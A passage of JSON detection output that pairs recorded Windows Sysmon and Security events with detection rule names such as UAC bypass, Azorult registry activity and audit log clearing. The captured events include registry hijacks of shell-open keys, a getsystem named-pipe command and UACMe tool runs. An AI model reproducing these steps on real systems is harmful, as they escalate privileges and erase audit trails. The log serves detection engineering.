18:01:57.417"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":110435,"Execution_attributes":{"ProcessID":3068,"ThreadID":2232},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-02T18:01:57.418442Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" WF.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"00247C92-9E03-5F7B-0000-0010A645272C","ParentProcessId":20228,"ProcessGuid":"00247C92-9E04-5F7B-0000-0010CF98272C","ProcessId":12876,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 22:28:20.529"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164913,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T22:28:20.530062Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"C:\\Windows\\system32\\cmd.exe\"","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5808-5D45-0000-00106CDC3E00","ProcessId":924,"RuleName":"PrivEsc - UAC bypass UACME-34","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2019-08-03 09:46:48.692"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5132,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T09:46:48.726304Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8573,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\ImagePath","UtcTime":"2019-04-30 07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8574,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Meterpreter or Cobalt Strike Getsystem Service Start"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-F6A1-5CC7-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ParentProcessId":468,"ProcessGuid":"365ABB72-FD47-5CC7-0000-00106AF61D00","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 07:46:15.183"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8575,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.215239Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.230"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8576,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.246489Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 12:32:34.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7EE2-5D45-0000-00104E852801","ProcessId":5284,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\MSCOREE.DLL","UtcTime":"2019-08-03 12:32:34.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5494,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:32:34.875974Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":18195,"Execution_attributes":{"ProcessID":780,"ThreadID":3812},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:10:06.342445Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"IEWIN7","SubjectLogonId":"0x1371b","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-09 02:52:18.765","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wscript.exe.manifest","UtcTime":"2019-05-09 02:52:18.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11219,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:52:18.765888Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2018-01-03 01:21:25.726","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-95E7-5CD3-0000-001046950F00","ProcessId":2812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData:tghjx5xz2ky.vbs","UtcTime":"2019-05-09 02:52:23.500"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11241,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:52:23.500263Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5272,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:02.929209Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\(Default)","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5273,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:02.934826Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via Fodhelper.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\fodhelper.exe\" ","ParentImage":"C:\\Windows\\System32\\fodhelper.exe","ParentProcessGuid":"747F3D96-5E6F-5D45-0000-001014CA9D00","ParentProcessId":8180,"ProcessGuid":"747F3D96-5E70-5D45-0000-0010FCDD9D00","ProcessId":3656,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 10:14:08.401"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5277,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:08.472102Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe\" 64","Company":"Integrity Investment LLC","CurrentDirectory":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\","Description":"Pentesting utility","FileVersion":"3.5.1.2010","Hashes":"SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891","Image":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe","IntegrityLevel":"Medium","LogonGuid":"23F38D93-AE9B-5F8E-8CED-170000000000","LogonId":"0x17ed8c","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"23F38D93-AF70-5F8E-1E02-000000000C00","ParentProcessId":5592,"ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"Product":"UACMe","RuleName":"technique_id=T1059.001,technique_name=PowerShell","TerminalSessionId":2,"User":"DESKTOP-NTSSLJD\\den","UtcTime":"2020-10-20 11:50:54.800"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":1,"EventRecordID":622,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:54.810152Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using IEInstal - File","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-20 11:50:55.442","Image":"C:\\Program Files\\Internet Explorer\\IEInstal.exe","ProcessGuid":"23F38D93-CF1F-5F8E-CA08-000000000C00","ProcessId":8736,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:55.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":768,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:55.450643Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-20 11:50:56.082","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"23F38D93-CF1E-5F8E-C808-000000000C00","ProcessId":8712,"RuleName":"-","TargetFilename":"C:\\Users\\den\\AppData\\Local\\Temp\\[1]consent.exe","UtcTime":"2020-10-20 11:50:56.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":11,"EventRecordID":877,"Execution_attributes":{"ProcessID":7212,"ThreadID":9748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:56.090214Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"EventData":{"Company":"Integrity Investment LLC","Description":"UACMe proxy DLL","FileVersion":"3.5.1.2010","Hashes":"SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6","Image":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","ImageLoaded":"C:\\Users\\den\\AppData\\Local\\Temp\\IDC1.tmp\\[1]consent.exe","OriginalFileName":"Fubuki.dll","ProcessGuid":"23F38D93-CF20-5F8E-CE08-000000000C00","ProcessId":6896,"Product":"UACMe","RuleName":"technique_id=T1073,technique_name=DLL Side-Loading","Signature":"-","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-20 11:50:56.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DESKTOP-NTSSLJD","Correlation":null,"EventID":7,"EventRecordID":964,"Execution_attributes":{"ProcessID":7212,"ThreadID":5064},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-20T11:50:56.531639Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 10:51:46.599","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6742-5D45-0000-00104A66B500","ProcessId":6380,"RuleName":"PrivEsc - UAC Bypass UACME 32","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\OskSupport.dll","UtcTime":"2019-08-03 10:51:46.599"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5305,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:51:46.647421Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\System32\\cmd.exe /c notepad.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\exefile\\shell\\runas\\command\\IsolatedCommand","UtcTime":"2019-05-09 02:07:51.100"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11122,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:07:51.116072Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c notepad.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"?","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-8B77-5CD3-0000-0010E8FD2900","ParentProcessId":3836,"ProcessGuid":"365ABB72-8B80-5CD3-0000-001065512A00","ProcessId":2264,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 02:08:00.336"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11126,"Execution_attributes":{"ProcessID":1980,"ThreadID":1904},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:08:00.446150Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"alice.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":25048,"Execution_attributes":{"ProcessID":748,"ThreadID":6064},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-11-15T08:19:02.298512Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x1c363a4","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-1005675359-741490361-30848483-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious Binary Load"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Microsoft Application Virtualization Terminator","FileVersion":"10.0.18362.1 (WinBuild.160101.0800)","Hashes":"SHA1=D66B48C663F435419913D65E64ED4845CB9BC882,MD5=0419B6B1CCE7FA295A3DC1823E0AD685,SHA256=60BCF03195AE55304114E4AECD800C15C3F15DDDC91B742B4F5A9624494CCA65,IMPHASH=F578F8B5F8EA1AA29D7B69CDB8565B2E","Image":"C:\\Windows\\System32\\spoolsv.exe","ImageLoaded":"C:\\Windows\\System32\\AppVTerminator.dll","ProcessGuid":"6A3C3EF2-8168-5FBF-0000-0010435A0100","ProcessId":2032,"Product":"Microsoft® Windows® Operating System","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-11-26 